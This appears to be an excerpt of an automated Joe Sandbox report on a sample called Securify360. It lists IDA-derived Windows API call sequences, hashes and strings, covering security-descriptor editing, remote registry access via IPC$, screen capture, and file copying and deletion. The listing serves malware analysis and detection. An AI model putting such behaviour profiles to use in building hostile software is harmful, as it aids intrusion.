                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3840717409-0
                                                                                              • Opcode ID: 512abe2e69f48bd111d6a0d6ee9e1268b218b300772a82c990c56e19a8d3be28
                                                                                              • Instruction ID: 8f44b09919fdd0809ea8dd346154208ea59d380a2db141af55b2f01323bf741c
                                                                                              • Opcode Fuzzy Hash: 512abe2e69f48bd111d6a0d6ee9e1268b218b300772a82c990c56e19a8d3be28
                                                                                              • Instruction Fuzzy Hash: 98415C71580304AFEB318FA5CD48EAE7BB8EF8A711F204059F946D7258C7399940CB60
                                                                                              APIs
                                                                                              • __wsplitpath.LIBCMT ref: 00FFE053
                                                                                              • _wcscat.LIBCMT ref: 00FFE06B
                                                                                              • _wcscat.LIBCMT ref: 00FFE07D
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FFE092
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFE0A6
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00FFE0BE
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00FFE0D8
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00FFE0EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                              • String ID: *.*
                                                                                              • API String ID: 34673085-438819550
                                                                                              • Opcode ID: 13cb89c6ff1185b0a63f2dca25389b418cd24a1bfdd60feb921ca0d24681780b
                                                                                              • Instruction ID: e79e48f9915d0cccfc72867935f5f3e3f388b1038be8c4e4d5f2b833c7c41377
                                                                                              • Opcode Fuzzy Hash: 13cb89c6ff1185b0a63f2dca25389b418cd24a1bfdd60feb921ca0d24681780b
                                                                                              • Instruction Fuzzy Hash: 7C8183729043099FCB24DF64C844D7AB7E9BF95310F14882EF586C72A1E734E945EB92
                                                                                              APIs
                                                                                                • Part of subcall function 00F929E2: GetWindowLongW.USER32(?,000000EB), ref: 00F929F3
                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0101C8A4
                                                                                              • GetFocus.USER32 ref: 0101C8B4
                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0101C8BF
                                                                                              • _memset.LIBCMT ref: 0101C9EA
                                                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0101CA15
                                                                                              • GetMenuItemCount.USER32(?), ref: 0101CA35
                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0101CA48
                                                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0101CA7C
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0101CAC4
                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0101CAFC
                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0101CB31
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 1296962147-4108050209
                                                                                              • Opcode ID: 676a35e3eed1fbc76e7c8b095ba40092a3e49ef6eb66851611d549fb792142d0
                                                                                              • Instruction ID: 538498325938fbcfa3d4c46e60694a42c9e4c967ed597ba785b663595d38ca6f
                                                                                              • Opcode Fuzzy Hash: 676a35e3eed1fbc76e7c8b095ba40092a3e49ef6eb66851611d549fb792142d0
                                                                                              • Instruction Fuzzy Hash: 0381BE71248301AFE761CF18CA84AABBBE9FF88314F10455EF9C593285C739D905DBA2
                                                                                              APIs
                                                                                                • Part of subcall function 00FE8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FE8E3C
                                                                                                • Part of subcall function 00FE8E20: GetLastError.KERNEL32(?,00FE8900,?,?,?), ref: 00FE8E46
                                                                                                • Part of subcall function 00FE8E20: GetProcessHeap.KERNEL32(00000008,?,?,00FE8900,?,?,?), ref: 00FE8E55
                                                                                                • Part of subcall function 00FE8E20: HeapAlloc.KERNEL32(00000000,?,00FE8900,?,?,?), ref: 00FE8E5C
                                                                                                • Part of subcall function 00FE8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FE8E73
                                                                                                • Part of subcall function 00FE8EBD: GetProcessHeap.KERNEL32(00000008,00FE8916,00000000,00000000,?,00FE8916,?), ref: 00FE8EC9
                                                                                                • Part of subcall function 00FE8EBD: HeapAlloc.KERNEL32(00000000,?,00FE8916,?), ref: 00FE8ED0
                                                                                                • Part of subcall function 00FE8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FE8916,?), ref: 00FE8EE1
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FE8B2E
                                                                                              • _memset.LIBCMT ref: 00FE8B43
                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FE8B62
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00FE8B73
                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00FE8BB0
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FE8BCC
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00FE8BE9
                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FE8BF8
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00FE8BFF
                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FE8C20
                                                                                              • CopySid.ADVAPI32(00000000), ref: 00FE8C27
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FE8C58
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FE8C7E
                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FE8C92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3996160137-0
                                                                                              • Opcode ID: 1c024a5ccd7995cad9261ede173a9ba1f6e219dabcac143ee8674687bb186d81
                                                                                              • Instruction ID: 2324d131a2f33caded9ddd01c3a3c7c2f2e0ff5a8662c169d80a5587306bbd6c
                                                                                              • Opcode Fuzzy Hash: 1c024a5ccd7995cad9261ede173a9ba1f6e219dabcac143ee8674687bb186d81
                                                                                              • Instruction Fuzzy Hash: BD618F70900249AFDF20EF95DC84EEEBB79FF04350F148159F919A7294DB399A02DB60
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 01007A79
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 01007A85
                                                                                              • CreateCompatibleDC.GDI32(?), ref: 01007A91
                                                                                              • SelectObject.GDI32(00000000,?), ref: 01007A9E
                                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01007AF2
                                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01007B2E
                                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01007B52
                                                                                              • SelectObject.GDI32(00000006,?), ref: 01007B5A
                                                                                              • DeleteObject.GDI32(?), ref: 01007B63
                                                                                              • DeleteDC.GDI32(00000006), ref: 01007B6A
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 01007B75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                              • String ID: (
                                                                                              • API String ID: 2598888154-3887548279
                                                                                              • Opcode ID: 5334b9b955559f226a6f162d8b11446f41a66f243b19a7f2549ac5588bd3b592
                                                                                              • Instruction ID: fb20c5c5c15421daaf9c90a0d11fe8c8926003a4c79258d0e52ce8145b8ed8e8
                                                                                              • Opcode Fuzzy Hash: 5334b9b955559f226a6f162d8b11446f41a66f243b19a7f2549ac5588bd3b592
                                                                                              • Instruction Fuzzy Hash: D0514F71900309EFEB25CF98C884EAEBBB9FF49310F14851DF98997250D739A941CB50
                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00FFA4D4
                                                                                                • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 00FFA4F6
                                                                                              • __swprintf.LIBCMT ref: 00FFA54F
                                                                                              • __swprintf.LIBCMT ref: 00FFA568
                                                                                              • _wprintf.LIBCMT ref: 00FFA61E
                                                                                              • _wprintf.LIBCMT ref: 00FFA63C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 311963372-2391861430
                                                                                              • Opcode ID: d1235e0f47354227e441cf8c9b967552a251393591781b48f57680f52a40862b
                                                                                              • Instruction ID: 5a34b21677137fc395a59c66885eba00f6747acb20f7a01804760924292dd034
                                                                                              • Opcode Fuzzy Hash: d1235e0f47354227e441cf8c9b967552a251393591781b48f57680f52a40862b
                                                                                              • Instruction Fuzzy Hash: 275194B1900119ABCF25EBE0CD86EEEB779BF09340F140165F505B2061EB396F58EB51
                                                                                              APIs
                                                                                                • Part of subcall function 00FF951A: __time64.LIBCMT ref: 00FF9524
                                                                                                • Part of subcall function 00FA4A8C: _fseek.LIBCMT ref: 00FA4AA4
                                                                                              • __wsplitpath.LIBCMT ref: 00FF97EF
                                                                                                • Part of subcall function 00FB431E: __wsplitpath_helper.LIBCMT ref: 00FB435E
                                                                                              • _wcscpy.LIBCMT ref: 00FF9802
                                                                                              • _wcscat.LIBCMT ref: 00FF9815
                                                                                              • __wsplitpath.LIBCMT ref: 00FF983A
                                                                                              • _wcscat.LIBCMT ref: 00FF9850
                                                                                              • _wcscat.LIBCMT ref: 00FF9863
                                                                                                • Part of subcall function 00FF9560: _memmove.LIBCMT ref: 00FF9599
                                                                                                • Part of subcall function 00FF9560: _memmove.LIBCMT ref: 00FF95A8
                                                                                              • _wcscmp.LIBCMT ref: 00FF97AA
                                                                                                • Part of subcall function 00FF9CF1: _wcscmp.LIBCMT ref: 00FF9DE1
                                                                                                • Part of subcall function 00FF9CF1: _wcscmp.LIBCMT ref: 00FF9DF4
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FF9A0D
                                                                                              • _wcsncpy.LIBCMT ref: 00FF9A80
                                                                                              • DeleteFileW.KERNEL32(?,?), ref: 00FF9AB6
                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FF9ACC
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FF9ADD
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FF9AEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                              • String ID:
                                                                                              • API String ID: 1500180987-0
                                                                                              • Opcode ID: 9e160527f3c71d5c1493bde6c1161cceed6b10f1ed86f0dde25215e29c2f682e
                                                                                              • Instruction ID: 2271f7a26106dae4542e81e0311250c5e91c6f7df452799b4b2e1047a896d83d
                                                                                              • Opcode Fuzzy Hash: 9e160527f3c71d5c1493bde6c1161cceed6b10f1ed86f0dde25215e29c2f682e
                                                                                              • Instruction Fuzzy Hash: 35C15CB1D0021DAACF21DF95CC85AEEB7BDEF45310F0040AAF609E7151EBB49A849F65
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00FA5BF1
                                                                                              • GetMenuItemCount.USER32(01057890), ref: 00FE0E7B
                                                                                              • GetMenuItemCount.USER32(01057890), ref: 00FE0F2B
                                                                                              • GetCursorPos.USER32(?), ref: 00FE0F6F
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00FE0F78
                                                                                              • TrackPopupMenuEx.USER32(01057890,00000000,?,00000000,00000000,00000000), ref: 00FE0F8B
                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FE0F97
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                              • String ID:
                                                                                              • API String ID: 2751501086-0
                                                                                              • Opcode ID: 9a911fa1df0bb7b6329dc82bcc7aca1f605275474f51839ecc8be958b572fb59
                                                                                              • Instruction ID: ab2beac1aadd0ad736c3d5ecf46a966635ad239bb340048842610fb2926cd73c
                                                                                              • Opcode Fuzzy Hash: 9a911fa1df0bb7b6329dc82bcc7aca1f605275474f51839ecc8be958b572fb59
                                                                                              • Instruction Fuzzy Hash: 7471F070A00759BEEB309F65CC85FAABF64FF05764F200216F6146A1D0CBB568A0EB90
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                              • _memset.LIBCMT ref: 00FE8489
                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FE84BE
                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FE84DA
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FE84F6
                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FE8520
                                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FE8548
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FE8553
                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FE8558
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                              • API String ID: 1411258926-22481851
                                                                                              • Opcode ID: 8e058ab22536f514e0300e6d853da64a60c7df5242ac3cf7093f090c20a8023d
                                                                                              • Instruction ID: 98a172fad52d5c39c04394bb36f7d3189707011a11896b3671d091f58835090a
                                                                                              • Opcode Fuzzy Hash: 8e058ab22536f514e0300e6d853da64a60c7df5242ac3cf7093f090c20a8023d
                                                                                              • Instruction Fuzzy Hash: 674124B6C1022DABCB21EBA4DC95DEEB7B8FF08350F054129F845A3155EA399E05DB90
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101040D,?,?), ref: 01011491
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpper
                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                              • API String ID: 3964851224-909552448
                                                                                              • Opcode ID: ca3a949d63db6b12c81f879a321ff2d9a5a734bffb72176be1b303204f1ac7e4
                                                                                              • Instruction ID: 4ffd97e177b1cae6260fdd4257ce3380316d9f0af30ff6a6f50bc04bf7a82db2
                                                                                              • Opcode Fuzzy Hash: ca3a949d63db6b12c81f879a321ff2d9a5a734bffb72176be1b303204f1ac7e4
                                                                                              • Instruction Fuzzy Hash: 4141697050121ACBDF15EFA4DD80AEA3764BF06300F544454FED2572A6DF38E919DB60
                                                                                              APIs
                                                                                                • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                                                                • Part of subcall function 00FA153B: _memmove.LIBCMT ref: 00FA15C4
                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FF58EB
                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FF5901
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FF5912
                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FF5924
                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FF5935
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$_memmove
                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                              • API String ID: 2279737902-1007645807
                                                                                              • Opcode ID: d91c57fb30618741deaf296ae699b69126843facf1f0c403e6e5f5a665396fa7
                                                                                              • Instruction ID: 5c61114304627a58e81da30862801047f512111408bff99b4f622f3af2f65a98
                                                                                              • Opcode Fuzzy Hash: d91c57fb30618741deaf296ae699b69126843facf1f0c403e6e5f5a665396fa7
                                                                                              • Instruction Fuzzy Hash: 2911B2B195012DBAD734A7A3CC9ADFF7B7CFFD2F51F400429B941A6090DAA09D04D5A0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                              • String ID: 0.0.0.0
                                                                                              • API String ID: 208665112-3771769585
                                                                                              • Opcode ID: cbaf257bcdbd9b03d0b12678afa2d03cec6d2b5f9125bff540a8334c744d6be3
                                                                                              • Instruction ID: b541e4983d3b03271f1a656b9cc5cc79cfbc8d0b169c5153bfc1c321ee0b0272
                                                                                              • Opcode Fuzzy Hash: cbaf257bcdbd9b03d0b12678afa2d03cec6d2b5f9125bff540a8334c744d6be3
                                                                                              • Instruction Fuzzy Hash: BD113A3190520CABCB31BB619C4AEFB77BCDF41720F1402A5F28896095FF79A981AB50
                                                                                              APIs
                                                                                              • timeGetTime.WINMM ref: 00FF5535
                                                                                                • Part of subcall function 00FB0859: timeGetTime.WINMM(?,00000002,00F9C22C), ref: 00FB085D
                                                                                              • Sleep.KERNEL32(0000000A), ref: 00FF5561
                                                                                              • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00FF5585
                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FF55A7
                                                                                              • SetActiveWindow.USER32 ref: 00FF55C6
                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FF55D4
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00FF55F3
                                                                                              • Sleep.KERNEL32(000000FA), ref: 00FF55FE
                                                                                              • IsWindow.USER32 ref: 00FF560A
                                                                                              • EndDialog.USER32(00000000), ref: 00FF561B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000013.00000002.1451206484.0000000000F91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F90000, based on PE: true
                                                                                              • Associated: 00000013.00000002.1451188533.0000000000F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001020000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451261777.0000000001046000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451321302.0000000001050000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000013.00000002.1451347155.0000000001059000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_19_2_f90000_Securify360.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                              • String ID: BUTTON
                                                                                              • API String ID: 1194449130-3405671355
                                                                                              • Opcode ID: 7904cb7cec07010be963ea519bea8f576ada4696cad34071069a0d3468a3a076
                                                                                              • Instruction ID: c7aa81b341bccffb07655f280c28bed2af8bf577b365e4c7d0561ec7f9760d39
